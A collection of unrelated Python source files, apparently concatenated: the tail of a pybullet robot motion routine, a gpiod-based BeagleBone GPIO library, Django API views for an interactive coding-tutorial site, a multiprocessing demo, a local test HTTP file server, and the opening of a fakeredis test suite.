if abs(actual_pos[0] - self.pose_goal["position"][0]) <=\
self.linear_threshold / 2:
linear_vel_x = 0
if abs(actual_pos[1] - self.pose_goal["position"][1]) <=\
self.linear_threshold / 2:
linear_vel_y = 0
if abs(getOrientation(
actual_orn, self.pose_goal["orientation"])) <=\
self.angular_threshold:
angular_vel = 0
# Reset the velocity of the robot
time.sleep(0.02)
pybullet.resetBaseVelocity(
self.robot_model,
[linear_vel_x * self.p_x, linear_vel_y * self.p_y, 0],
[0, 0, angular_vel * self.p_theta],
physicsClientId=self.physics_client)
self._endProcess()
|
GPIOmay.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2013 Adafruit
Original RPi.GPIO Py-Wrapper Author Ben Croston
Modified for BBIO Py-Wrapper Author Justin Cooper
Authors of Full Python Implementation: Mark Yoder, Joshua Key, and Eric Morse
This file incorporates work covered by the following copyright and
permission notice, all modified code adopts the original license:
Copyright (c) 2013 Ben Croston
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""gpiod-based GPIO functionality of a BeagleBone using Python."""
import gpiod
import sys
#import multiprocessing
from multiprocessing import Pipe, Process
# import select
import time
ALT0 = 4
BOTH = 3
FALLING = 2
HIGH = 1
IN = 0
LOW = 0
OUT = 1
PUD_DOWN = 1
PUD_OFF = 0
PUD_UP = 2
RISING = 1
VERSION = '0.0.0'
threads=[]
ports={} # Dictionary of channel/line pairs that are open
CONSUMER='GPIOmay'
parent_conn = []
gChannel = []
gChannelNames = []
# Table generated based on https://github.com/jadonk/bonescript/blob/master/src/bone.js
table = [
[ "USR0", "USR0", 53, -1, -1, "GPMC_A5"],
[ "USR1", "USR1", 54, -1, -1, "GPMC_A6"],
[ "USR2", "USR2", 55, -1, -1, "GPMC_A7"],
[ "USR3", "USR3", 56, -1, -1, "GPMC_A8"],
[ "DGND", "P8_1", 0, -1, -1, "unused"],
[ "DGND", "P8_2", 0, -1, -1, "unused"],
[ "GPIO1_6", "P8_3", 38, -1, -1, "GPMC_AD6"],
[ "GPIO1_7", "P8_4", 39, -1, -1, "GPMC_AD7"],
[ "GPIO1_2", "P8_5", 34, -1, -1, "GPMC_AD2"],
[ "GPIO1_3", "P8_6", 35, -1, -1, "GPMC_AD3"],
[ "TIMER4", "P8_7", 66, 2, -1, "GPMC_ADVN_ALE"],
[ "TIMER7", "P8_8", 67, 2, -1, "GPMC_OEN_REN"],
[ "TIMER5", "P8_9", 69, 2, -1, "GPMC_BEON_CLE"],
[ "TIMER6", "P8_10", 68, 2, -1, "GPMC_WEN"],
[ "GPIO1_13", "P8_11", 45, -1, -1, "GPMC_AD13"],
[ "GPIO1_12", "P8_12", 44, -1, -1, "GPMC_AD12"],
[ "EHRPWM2B", "P8_13", 23, 4, -1, "GPMC_AD9"],
[ "GPIO0_26", "P8_14", 26, -1, -1, "GPMC_AD10"],
[ "GPIO1_15", "P8_15", 47, -1, -1, "GPMC_AD15"],
[ "GPIO1_14", "P8_16", 46, -1, -1, "GPMC_AD14"],
[ "GPIO0_27", "P8_17", 27, -1, -1, "GPMC_AD11"],
[ "GPIO2_1", "P8_18", 65, -1, -1, "GPMC_DK_MUX0"],
[ "EHRPWM2A", "P8_19", 22, 4, -1, "GPMC_AD8"],
[ "GPIO1_31", "P8_20", 63, -1, -1, "GPMC_CSN2"],
[ "GPIO1_30", "P8_21", 62, -1, -1, "GPMC_CSN1"],
[ "GPIO1_5", "P8_22", 37, -1, -1, "GPMC_AD5"],
[ "GPIO1_4", "P8_23", 36, -1, -1, "GPMC_AD4"],
[ "GPIO1_1", "P8_24", 33, -1, -1, "GPMC_AD1"],
[ "GPIO1_0", "P8_25", 32, -1, -1, "GPMC_AD0"],
[ "GPIO1_29", "P8_26", 61, -1, -1, "GPMC_CSN0"],
[ "GPIO2_22", "P8_27", 86, -1, -1, "LCD_VSYNC"],
[ "GPIO2_24", "P8_28", 88, -1, -1, "LCD_PCLK"],
[ "GPIO2_23", "P8_29", 87, -1, -1, "LCD_HSYNC"],
[ "GPIO2_25", "P8_30", 89, -1, -1, "LCD_AC_BIAS_EN"],
[ "UART5_CTSN", "P8_31", 10, -1, -1, "LCD_DATA14"],
[ "UART5_RTSN", "P8_32", 11, -1, -1, "LCD_DATA15"],
[ "UART4_RTSN", "P8_33", 9, -1, -1, "LCD_DATA13"],
[ "UART3_RTSN", "P8_34", 81, 2, -1, "LCD_DATA11"],
[ "UART4_CTSN", "P8_35", 8, -1, -1, "LCD_DATA12"],
[ "UART3_CTSN", "P8_36", 80, 2, -1, "LCD_DATA10"],
[ "UART5_TXD", "P8_37", 78, -1, -1, "LCD_DATA8"],
[ "UART5_RXD", "P8_38", 79, -1, -1, "LCD_DATA9"],
[ "GPIO2_12", "P8_39", 76, -1, -1, "LCD_DATA6"],
[ "GPIO2_13", "P8_40", 77, -1, -1, "LCD_DATA7"],
[ "GPIO2_10", "P8_41", 74, -1, -1, "LCD_DATA4"],
[ "GPIO2_11", "P8_42", 75, -1, -1, "LCD_DATA5"],
[ "GPIO2_8", "P8_43", 72, -1, -1, "LCD_DATA2"],
[ "GPIO2_9", "P8_44", 73, -1, -1, "LCD_DATA3"],
[ "GPIO2_6", "P8_45", 70, 3, -1, "LCD_DATA0"],
[ "GPIO2_7", "P8_46", 71, 3, -1, "LCD_DATA1"],
[ "DGND", "P9_1", 0, -1, -1, "unused"],
[ "DGND", "P9_2", 0, -1, -1, "unused"],
[ "VDD_3V3", "P9_3", 0, -1, -1, "unused"],
[ "VDD_3V3", "P9_4", 0, -1, -1, "unused"],
[ "VDD_5V", "P9_5", 0, -1, -1, "unused"],
[ "VDD_5V", "P9_6", 0, -1, -1, "unused"],
[ "SYS_5V", "P9_7", 0, -1, -1, "unused"],
[ "SYS_5V", "P9_8", 0, -1, -1, "unused"],
[ "PWR_BUT", "P9_9", 0, -1, -1, "unused"],
[ "SYS_RESETn", "P9_10", 0, -1, -1, "unused"],
[ "UART4_RXD", "P9_11", 30, -1, -1, "GPMC_WAIT0"],
[ "GPIO1_28", "P9_12", 60, -1, -1, "GPMC_BEN1"],
[ "UART4_TXD", "P9_13", 31, -1, -1, "GPMC_WPN"],
[ "EHRPWM1A", "P9_14", 50, 6, -1, "GPMC_A2"],
[ "GPIO1_16", "P9_15", 48, -1, -1, "GPMC_A0"],
[ "EHRPWM1B", "P9_16", 51, 6, -1, "GPMC_A3"],
[ "I2C1_SCL", "P9_17", 5, -1, -1, "SPI0_CS0"],
[ "I2C1_SDA", "P9_18", 4, -1, -1, "SPI0_D1"],
[ "I2C2_SCL", "P9_19", 13, -1, -1, "UART1_RTSN"],
[ "I2C2_SDA", "P9_20", 12, -1, -1, "UART1_CTSN"],
[ "UART2_TXD", "P9_21", 3, 3, -1, "SPI0_D0"],
[ "UART2_RXD", "P9_22", 2, 3, -1, "SPI0_SCLK"],
[ "GPIO1_17", "P9_23", 49, -1, -1, "GPMC_A1"],
[ "UART1_TXD", "P9_24", 15, -1, -1, "UART1_TXD"],
[ "GPIO3_21", "P9_25", 117, -1, -1, "MCASP0_AHCLKX"],
[ "UART1_RXD", "P9_26", 14, -1, -1, "UART1_RXD"],
[ "GPIO3_19", "P9_27", 115, -1, -1, "MCASP0_FSR"],
[ "SPI1_CS0", "P9_28", 113, 4, -1, "MCASP0_AHCLKR"],
[ "SPI1_D0", "P9_29", 111, 1, -1, "MCASP0_FSX"],
[ "SPI1_D1", "P9_30", 112, -1, -1, "MCASP0_AXR0"],
[ "SPI1_SCLK", "P9_31", 110, 1, -1, "MCASP0_ACLKX"],
[ "VDD_ADC", "P9_32", 0, -1, -1, "unused"],
[ "AIN4", "P9_33", 0, -1, 4, "unused"],
[ "GNDA_ADC", "P9_34", 0, -1, -1, "uused"],
[ "AIN6", "P9_35", 0, -1, 6, "unused"],
[ "AIN5", "P9_36", 0, -1, 5, "unused"],
[ "AIN2", "P9_37", 0, -1, 2, "unused"],
[ "AIN3", "P9_38", 0, -1, 3, "unused"],
[ "AIN0", "P9_39", 0, -1, 0, "unused"],
[ "AIN1", "P9_40", 0, -1, 1, "unused"],
[ "CLKOUT2", "P9_41", 20, -1, -1, "XDMA_EVENT_INTR1"],
[ "GPIO0_7", "P9_42", 7, 0, -1, "ECAP0_IN_PWM0_OUT"],
[ "DGND", "P9_43", 0, -1, -1, "unused"],
[ "DGND", "P9_44", 0, -1, -1, "unused"],
[ "DGND", "P9_45", 0, -1, -1, "unused"],
[ "DGND", "P9_46", 0, -1, -1, "unused"],
# Commented out Blue and PocketBeagle since our project doesn't use them
# These are for the Blue
#[ "GP0_3", "GP0_3", 57, -1, -1, "blue"],
#[ "GP0_4", "GP0_4", 49, -1, -1, "blue"],
#[ "GP0_5", "GP0_5", 116, -1, -1, "blue"],
#[ "GP0_6", "GP0_6", 113, -1, -1, "blue"],
#[ "GP1_3", "GP1_3", 98, -1, -1],
#[ "GP1_4", "GP1_4", 97, -1, -1],
#[ "RED_LED", "RED", 66, -1, -1], # LEDs
#[ "GREEN_LED", "GREEN", 67, -1, -1],
#[ "BAT25", "BAT25", 27, -1, -1],
#[ "BAT50", "BAT50", 11, -1, -1],
#[ "BAT75", "BAT75", 61, -1, -1],
#[ "BAT100", "BAT100", 10000, -1, -1], # Placeholder
#[ "WIFI", "WIFI", 10001, -1, -1], # Placeholder
#[ "PAUSE", "P8_9", 69, 1, -1],
#[ "MODE", "P8_10", 68, 1, -1],
# These are for the PocketBeagle
#[ "VIN_AC", "P1_1", 0, -1, -1],
#[ "GPIO2_23", "P1_2", 87, -1, -1],
#[ "USB1_DRVVBUS", "P1_3", 0, -1, -1],
#[ "GPIO2_25", "P1_4", 89, -1, -1],
#[ "USB1_VBUS_IN", "P1_5", 0, -1, -1],
#[ "SPI0_CS0", "P1_6", 5, -1, -1],
#[ "VIN-USB", "P1_7", 0, -1, -1],
#[ "SPI0_SCLK", "P1_8", 2, 3, -1],
#[ "USB1-DN", "P1_9", 0, -1, -1],
#[ "SPI0_D0", "P1_10", 3, 3, -1],
#[ "USB1-DP", "P1_11", 0, -1, -1],
#[ "SPI0_D1", "P1_12", 4, -1, -1],
#[ "USB1-ID", "P1_13", 0, -1, -1],
#[ "VOUT-3.3V", "P1_14", 0, -1, -1],
#[ "GND", "P1_15", 0, -1, -1],
#[ "GND", "P1_16", 0, -1, -1],
#[ "VREFN", "P1_17", 0, -1, -1],
#[ "VREFP", "P1_18", 0, -1, -1],
#[ "AIN0", "P1_19", 0, -1, 0],
#[ "GPIO0_20", "P1_20", 20, 4, -1],
#[ "AIN1", "P1_21", 0, -1, 1],
#[ "GND", "P1_22", 0, -1, -1],
#[ "AIN2", "P1_23", 0, -1, 2],
#[ "VOUT-5V", "P1_24", 0, -1, -1],
#[ "AIN3", "P1_25", 0, -1, 3],
#[ "I2C2_SDA", "P1_26", 12, 1, -1],
#[ "AIN4", "P1_27", 0, -1, 4],
#[ "I2C2_SCL", "P1_28", 13, 1, -1],
#[ "GPIO3_21", "P1_29", 117, -1, -1],
#[ "UART0_TXD", "P1_30", 43, -1, -1],
#[ "GPIO3_18", "P1_31", 114, -1, -1],
#[ "UART0_RXD", "P1_32", 42, -1, -1],
#[ "GPIO3_15", "P1_33", 111, 1, -1],
#[ "GPIO0_26", "P1_34", 26, -1, -1],
#[ "GPIO2_24", "P1_35", 88, -1, -1],
#[ "EHRPWM0A", "P1_36", 110, 1, -1],
#[ "EHRPWM1A", "P2_1", 50, 6, -1],
#[ "GPIO1_27", "P2_2", 59, -1, -1],
#[ "GPIO0_23", "P2_3", 23, 4, -1],
#[ "GPIO1_26", "P2_4", 58, -1, -1],
#[ "UART4_RXD", "P2_5", 30, -1, -1],
#[ "GPIO1_25", "P2_6", 57, -1, -1],
#[ "UART4_TXD", "P2_7", 31, -1, -1],
#[ "GPIO1_28", "P2_8", 60, -1, -1],
#[ "I2C1_SCL", "P2_9", 15, -1, -1],
#[ "GPIO1_20", "P2_10", 52, -1, -1],
#[ "I2C1_SDA", "P2_11", 14, -1, -1],
#[ "POWER_BUTTON", "P2_12", 0, -1, -1],
#[ "VOUT-5V", "P2_13", 0, -1, -1],
#[ "BAT-VIN", "P2_14", 0, -1, -1],
#[ "GND", "P2_15", 0, -1, -1],
#[ "BAT-TEMP", "P2_16", 0, -1, -1],
#[ "GPIO2_1", "P2_17", 65, -1, -1],
#[ "GPIO1_15", "P2_18", 47, -1, -1],
#[ "GPIO0_27", "P2_19", 27, -1, -1],
#[ "GPIO2_0", "P2_20", 64, -1, -1],
#[ "GND", "P2_21", 0, -1, -1],
#[ "GPIO1_14", "P2_22", 46, -1, -1],
#[ "VOUT-3.3V", "P2_23", 0, -1, -1],
#[ "GPIO1_12", "P2_24", 44, -1, -1],
#[ "SPI1_CS0", "P2_25", 41, -1, -1],
#[ "RESET#", "P2_26", 0, -1, -1],
#[ "SPI1_D0", "P2_27", 40, 5, -1],
#[ "GPIO3_20", "P2_28", 116, -1, -1],
#[ "SPI1_SCLK", "P2_29", 7, -1, -1],
#[ "GPIO3_17", "P2_30", 113, -1, -1],
#[ "SPI1_CS1", "P2_31", 19, 2, -1],
#[ "GPIO3_16", "P2_32", 112, -1, -1],
#[ "GPIO1_13", "P2_33", 45, -1, -1],
#[ "GPIO3_19", "P2_34", 115, -1, -1],
#[ "GPIO2_22", "P2_35", 86, -1, -1],
#[ "AIN7", "P2_36", 0, -1, 7],
[ None, None, 0, 0, 0, "unused" ]
]
def channelNameConvert(channel):
global gChannel
global gChannelNames
for i in range(0, len(gChannel)):
if channel == gChannelNames[i]:
return gChannel[i]
print("Error: name not found")
return "error"
def run(channel, edge, callback=None, debounce=0, child_conn=None):
channel = channelNameConvert(channel)
thread_go = True
while thread_go:
event_detected = None
thread_go = wait_for_edge(channel, edge, child_conn)
if thread_go:
time.sleep(debounce/1000000.0)
callback(channel)
#thread_go = not child_conn.poll()
#if not thread_go:
# child_conn.close()
def setup(channel, direction):
"""Set up the GPIO channel, direction and (optional) pull/up down control.
channel - channel can be in the form of 'P8_10', or 'EHRPWM2A'
direction - INPUT or OUTPUT
[pull_up_down] - PUD_OFF (default), PUD_UP or PUD_DOWN
[initial] - Initial value for an output channel
[delay] - Time in milliseconds to wait after exporting gpio pin"""
global gChannel
global gChannelNames
for index in table:
if index[1] == channel:
channel = index[5]
gChannel.append(index[5])
gChannelNames.append(index[1])
break
elif index[0] == channel:
channel = index[5]
gChannel.append(index[5])
gChannelNames.append(index[0])
break
elif index[5] == channel:
gChannel.append(index[5])
gChannelNames.append(index[5])
found=0
# Searh for channel in either name or consumer
for chip in gpiod.ChipIter():
# print('[] - [] lines:'.format(chip.name(), chip.num_lines()))
for line in gpiod.LineIter(chip):
offset = line.offset()
name = line.name()
consumer = line.consumer()
linedirection = line.direction()
active_state = line.active_state()
if name == channel or consumer == channel:
# print('[]\tline [:>3]: [:>18] [:>12] [:>8] [:>10]'.format(
# chip.name(),
# offset,
# 'unnamed' if name is None else name,
# 'unused' if consumer is None else consumer,
# 'input' if linedirection == gpiod.Line.DIRECTION_INPUT else 'output',
# 'active-low' if active_state == gpiod.Line.ACTIVE_LOW else 'active-high'))
found=1
break
if found:
break
chip.close()
if not found:
print(channel + ': Not found')
sys.exit(1)
# print(chip)
lines = chip.get_lines([offset])
# print(lines)
if direction == IN:
ret = lines.request(consumer=CONSUMER, type=gpiod.LINE_REQ_DIR_IN)
elif direction == OUT:
ret = lines.request(consumer=CONSUMER, type=gpiod.LINE_REQ_DIR_OUT)
else:
print("Unknown direction: " + str(direction))
sys.exit(1)
if ret:
print(ret)
ports[channel] = [lines, chip]
# print(ports)
def output(channel, vals):
"""Output to a GPIO channel
channel - gpio channel
value - 0/1 or False/True or LOW/HIGH"""
# print("output()")
print(channel)
channel = channelNameConvert(channel)
print(channel)
if type(vals) is not type([]):
vals = [vals]
ret = ports[channel][0].set_values(vals)
if ret:
print(ret)
def input(channel):
"""Input from a GPIO channel. Returns HIGH=1=True or LOW=0=False
gpio - gpio channel"""
# print("input()")
# print(channel)
channel = channelNameConvert(channel)
return ports[channel][0].get_values()
def wait_for_edge(channel, edge, child_conn, timeout = -1):
"""Wait for an edge.
channel - gpio channel
edge - RISING, FALLING or BOTH
timeout (optional) - time to wait in miliseconds. -1 will wait forever (default)"""
# print("wait_for_edge()")
# print(ports)
channel = channelNameConvert(channel)
line=ports[channel][0]
chip=ports[channel][1]
if edge == RISING:
ev_edge = gpiod.LINE_REQ_EV_RISING_EDGE
elif edge == FALLING:
ev_edge = gpiod.LINE_REQ_EV_FALLING_EDGE
elif edge == BOTH:
ev_edge = gpiod.LINE_REQ_EV_BOTH_EDGES
else:
print("Unknown edge type: " + str(edge))
# Try releasing the line and requesting again
offset = line.to_list()[0].offset()
line.release()
line = chip.get_lines([offset])
line.request(consumer=CONSUMER, type=ev_edge)
x = None
while not x:
thread_go = not child_conn.poll()
if not thread_go:
return False
x = line.event_wait(sec = 1)
return True
def add_event_detect(channel, edge, callback=None, debounce=0):
"""Enable edge detection events for a particular GPIO channel.
channel - board pin number.
edge - RISING, FALLING or BOTH
[callback] - A callback function for the event (optional)
[bouncetime] - Switch bounce timeout in ms for callback"""
global threads
global parent_conn
channel = channelNameConvert(channel)
parent_conn_temp, child_conn = Pipe()
parent_conn.append(parent_conn_temp)
process2 = Process(target = run, args = (channel, edge, callback, debounce, child_conn))
threads.append(process2)
process2.start()
return
def cleanup():
"""Clean up by resetting all GPIO channels that have been used by
this program to INPUT with no pullup/pulldown and no event detection."""
global ports
global threads
i = 0
for thread in threads:
parent_conn[i].send(False)
parent_conn[i].close()
thread.join()
thread.close()
i = i + 1
for channel, val in ports.items():
ret = val[0].release()
if ret:
print(ret)
ret = val[1].close()
if ret:
print(ret)
ports={}
|
views.py
|
import json
import logging
import traceback
from datetime import datetime
from pathlib import Path
from threading import Thread
from time import sleep
from typing import get_type_hints
from uuid import uuid4
import birdseye.server
import requests
from birdseye import eye
from django.conf import settings
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.forms import ModelForm
from django.http import HttpResponse, JsonResponse
from django.views import View
from django.views.generic import CreateView
from django_user_agents.utils import get_user_agent
from littleutils import select_attrs, only
from sentry_sdk import capture_exception
from main.models import CodeEntry, ListEmail, User
from main.text import page_slugs_list, pages
from main.utils import highlighted_markdown
from main.utils.django import PlaceHolderForm
from main.workers.master import worker_result
log = logging.getLogger(__name__)
def api_view(request, method_name):
try:
method = getattr(API(request), method_name)
body = request.body
body = body.decode('utf8')
args = json.loads(body)
for arg_name, hint in get_type_hints(method).items():
if arg_name == 'return':
continue
arg = args[arg_name]
if not isinstance(arg, hint):
log.warning(
'Incorrect type for argument %s = %r of method %s: found %s, expected %s',
arg_name, arg, method_name, arg.__class__.__name__, hint.__name__)
result = method(**args)
if not isinstance(result, dict):
result = {'result': result}
except Exception:
capture_exception()
result = dict(
error=dict(
traceback=traceback.format_exc(),
)
)
return JsonResponse(result)
class API:
def __init__(self, request):
self.request = request
@property
def user(self) -> User:
return self.request.user
def run_code(self, code, source, page_index, step_index):
page_slug = page_slugs_list[page_index]
page = pages[page_slug]
step_name = pages[page_slug].step_names[step_index]
step = getattr(page, step_name)
entry_dict = dict(
input=code,
source=source,
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
entry = None
if settings.SAVE_CODE_ENTRIES:
entry = CodeEntry.objects.create(**entry_dict)
result = worker_result(entry_dict)
if settings.SAVE_CODE_ENTRIES:
entry.output = result["output"]
entry.save()
if result["error"]:
return dict(error=result["error"])
if passed := result["passed"]:
self.move_step(page_index, step_index + 1)
output_parts = result["output_parts"]
if not result["awaiting_input"]:
output_parts.append(dict(text=">>> ", color="white"))
birdseye_url = None
birdseye_objects = result["birdseye_objects"]
if birdseye_objects:
functions = birdseye_objects["functions"]
top_old_function_id = only(
f["id"]
for f in functions
if f["name"] == "<module>"
)
function_ids = [d.pop('id') for d in functions]
functions = [eye.db.Function(**{**d, 'hash': uuid4().hex}) for d in functions]
with eye.db.session_scope() as session:
for func in functions:
session.add(func)
session.commit()
function_ids = {old: func.id for old, func in zip(function_ids, functions)}
call_id = None
for call in birdseye_objects["calls"]:
old_function_id = call["function_id"]
is_top_call = old_function_id == top_old_function_id
call["function_id"] = function_ids[old_function_id]
call["start_time"] = datetime.fromisoformat(call["start_time"])
call = eye.db.Call(**call)
session.add(call)
if is_top_call:
call_id = call.id
birdseye_url = f"/birdseye/call/{call_id}"
return dict(
result=output_parts,
messages=list(map(highlighted_markdown, result["messages"])),
state=self.current_state(),
birdseye_url=birdseye_url,
passed=passed,
prediction=dict(
choices=getattr(step, "predicted_output_choices", None),
answer=getattr(step, "correct_output", None),
) if passed else dict(choices=None, answer=None),
)
def load_data(self):
user = self.user
if user.is_anonymous:
return {}
Thread(target=self.warmup_user_process).start()
return dict(
pages=[
dict(**select_attrs(page, "slug title index"), steps=page.step_dicts)
for page in pages.values()
],
state=self.current_state(),
user=dict(
email=user.email,
developerMode=user.developer_mode,
),
page_index=pages[self.user.page_slug].index,
)
def warmup_user_process(self):
page_slug = page_slugs_list[0]
step_name = pages[page_slug].step_names[0]
entry_dict = dict(
input="# dummy startup code",
source="shell",
page_slug=page_slug,
step_name=step_name,
user_id=self.user.id,
)
worker_result(entry_dict)
def set_developer_mode(self, value: bool):
self.user.developer_mode = value
self.user.save()
def current_state(self):
pages_progress = self.user.pages_progress
return dict(
pages_progress=[
page.step_names.index(pages_progress[page_slug]["step_name"])
for page_slug, page in pages.items()
],
)
def move_step(self, page_index, step_index: int):
page_slug = page_slugs_list[page_index]
step_names = pages[page_slug].step_names
if 0 <= step_index < len(step_names):
new_step_name = step_names[step_index]
self.user.pages_progress[page_slug]["step_name"] = new_step_name
self.user.save()
return self.current_state()
def set_page(self, index):
self.user.page_slug = page_slugs_list[index]
self.user.save()
def get_solution(self, page_index, step_index: int):
# TODO deprecated
page = pages[page_slugs_list[page_index]]
step = getattr(page, page.step_names[step_index])
return step.get_solution
def submit_feedback(self, title, description, state):
"""Create an issue on github.com using the given parameters."""
body = f"""
**User Issue**
Email: {self.user.email}
User Agent: {get_user_agent(self.request)}
{description}
<details>
<summary>Redux state</summary>
<p>
```json
{json.dumps(state, indent=2)}
```
</p>
</details>
"""
r = requests.post(
'https://api.github.com/repos/alexmojaki/futurecoder/issues',
json={'title': title,
'body': body,
'labels': ['user', 'bug']},
headers=dict(
Authorization='token ' + settings.GITHUB_TOKEN,
),
)
assert r.status_code == 201
class FrontendAppView(LoginRequiredMixin, View):
"""
Serves the compiled frontend entry point (only works if you have run `yarn
run build`).
"""
def get(self, _request):
try:
with open(Path(__file__).parent / "../../frontend/build/index.html") as f:
return HttpResponse(f.read())
except FileNotFoundError:
return HttpResponse(
"""
This URL is only used when you have built the production
version of the app. Visit http://localhost:3000/ instead, or
run `yarn run build` to test the production version.
""",
status=501,
)
class HomePageView(SuccessMessageMixin, CreateView):
template_name = "home.html"
success_message = "Success! We will email %(email)s when the time is right..."
def get_success_url(self):
return self.request.path_info
class form_class(ModelForm, PlaceHolderForm):
helper_attrs = dict(form_tag=False)
class Meta:
model = ListEmail
fields = ["email"]
def timeout_view(request):
sleep(35)
def fix_birdseye_server():
views = birdseye.server.app.view_functions
birdseye.server.app.view_functions = {
"call_view": views["ipython_call_view"],
"static": views["static"],
}
fix_birdseye_server()
|
multiprocessing_hello_world.py
|
import multiprocessing
import time
def hello_world(delay):
print(f'Hello ...{delay}')
time.sleep(delay)
return f'...{delay} sec delayed world!'
t1 = time.time()
p1 = multiprocessing.Process(target=hello_world, args=[1.0])
p2 = multiprocessing.Process(target=hello_world, args=[1.0])
p1.start()
p2.start()
t2 = time.time()
# Note that this print comes _long_ before the threads
print("This prints after %s" % (t2-t1))
p1.join()
p2.join()
t2 = time.time()
# Note that this print comes _long_ before the threads
print("Actually done after %s" % (t2-t1))
t1 = time.time()
# New
p1 = multiprocessing.Process(target=hello_world, args=[1.0])
p2 = multiprocessing.Process(target=hello_world, args=[1.0])
p1.start()
p2.start()
p1.join()
p2.join()
t2 = time.time()
# Note that this print comes _long_ before the threads
print("Correctly done after %s" % (t2-t1))
|
httpd.py
|
import hashlib
import os
import threading
from http import HTTPStatus
from http.server import HTTPServer, SimpleHTTPRequestHandler
from RangeHTTPServer import RangeRequestHandler
class TestRequestHandler(RangeRequestHandler):
checksum_header = None
def end_headers(self):
# RangeRequestHandler only sends Accept-Ranges header if Range header
# is present, see https://github.com/danvk/RangeHTTPServer/issues/23
if not self.headers.get("Range"):
self.send_header("Accept-Ranges", "bytes")
# Add a checksum header
if self.checksum_header:
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file) as fd:
encoded_text = fd.read().encode("utf8")
checksum = hashlib.md5(encoded_text).hexdigest()
self.send_header(self.checksum_header, checksum)
RangeRequestHandler.end_headers(self)
class ETagHandler(TestRequestHandler):
checksum_header = "ETag"
class ContentMD5Handler(TestRequestHandler):
checksum_header = "Content-MD5"
class PushRequestHandler(SimpleHTTPRequestHandler):
def _chunks(self):
while True:
data = self.rfile.readline(65537)
chunk_size = int(data[:-2], 16)
if chunk_size == 0:
return
data = self.rfile.read(chunk_size)
yield data
self.rfile.read(2)
def do_POST(self):
chunked = self.headers.get("Transfer-Encoding", "") == "chunked"
path = self.translate_path(self.path)
try:
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "wb") as fd:
if chunked:
for chunk in self._chunks():
fd.write(chunk)
else:
size = int(self.headers.get("Content-Length", 0))
fd.write(self.rfile.read(size))
except OSError as e:
self.send_error(HTTPStatus.INTERNAL_SERVER_ERROR, str(e))
self.send_response(HTTPStatus.OK)
self.end_headers()
class StaticFileServer:
_lock = threading.Lock()
def __init__(self, handler_class=ETagHandler):
self._lock.acquire()
self._httpd = HTTPServer(("localhost", 0), handler_class)
self._thread = None
def __enter__(self):
self._thread = threading.Thread(target=self._httpd.serve_forever)
self._thread.daemon = True
self._thread.start()
return self._httpd
def __exit__(self, *args):
self._httpd.socket.close()
self._httpd.shutdown()
self._httpd.server_close()
self._lock.release()
|
test_fakeredis.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from time import sleep, time
from redis.exceptions import ResponseError
import inspect
from functools import wraps
import os
import sys
import threading
from nose.plugins.skip import SkipTest
from nose.plugins.attrib import attr
import redis
import redis.client
import fakeredis
from datetime import datetime, timedelta
try:
# Python 2.6, 2.7
from Queue import Queue
except:
# Python 3
from queue import Queue
PY2 = sys.version_info[0] == 2
if not PY2:
long = int
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
else:
import unittest
# Try importlib, then imp, then the old builtin `reload`
try:
from importlib import reload
except:
try:
from imp import reload
except:
pass
DEFAULT_ENCODING = fakeredis.DEFAULT_ENCODING
def redis_must_be_running(cls):
# This can probably be improved. This will determines
# at import time if the tests should be run, but we probably
# want it to be when the tests are actually run.
try:
r = redis.StrictRedis('localhost', port=6379)
r.ping()
except redis.ConnectionError:
redis_running = False
else:
redis_running = True
if not redis_running:
for name, attribute in inspect.getmembers(cls):
if name.startswith('test_'):
@wraps(attribute)
def skip_test(*args, **kwargs):
raise SkipTest("Redis is not running.")
setattr(cls, name, skip_test)
cls.setUp = lambda x: None
cls.tearDown = lambda x: None
return cls
def key_val_dict(size=100):
return dict([(b'key:' + bytes([i]), b'val:' + bytes([i]))
for i in range(size)])
class TestFakeStrictRedis(unittest.TestCase):
decode_responses = False
def setUp(self):
self.redis = self.create_redis()
def tearDown(self):
self.redis.flushall()
del self.redis
if sys.version_info >= (3,):
def assertItemsEqual(self, a, b):
return self.assertCountEqual(a, b)
def create_redis(self, db=0):
return fakeredis.FakeStrictRedis(db=db)
def _round_str(self, x):
self.assertIsInstance(x, bytes)
return round(float(x))
def test_flushdb(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.keys(), [b'foo'])
self.assertEqual(self.redis.flushdb(), True)
self.assertEqual(self.redis.keys(), [])
def test_set_then_get(self):
self.assertEqual(self.redis.set('foo', 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_None_value(self):
self.assertEqual(self.redis.set('foo', None), True)
self.assertEqual(self.redis.get('foo'), b'None')
def test_set_float_value(self):
x = 1.23456789123456789
self.redis.set('foo', x)
self.assertEqual(float(self.redis.get('foo')), x)
def test_saving_non_ascii_chars_as_value(self):
self.assertEqual(self.redis.set('foo', 'Ñandu'), True)
self.assertEqual(self.redis.get('foo'),
u'Ñandu'.encode(DEFAULT_ENCODING))
def test_saving_unicode_type_as_value(self):
self.assertEqual(self.redis.set('foo', u'Ñandu'), True)
self.assertEqual(self.redis.get('foo'),
u'Ñandu'.encode(DEFAULT_ENCODING))
def test_saving_non_ascii_chars_as_key(self):
self.assertEqual(self.redis.set('Ñandu', 'foo'), True)
self.assertEqual(self.redis.get('Ñandu'), b'foo')
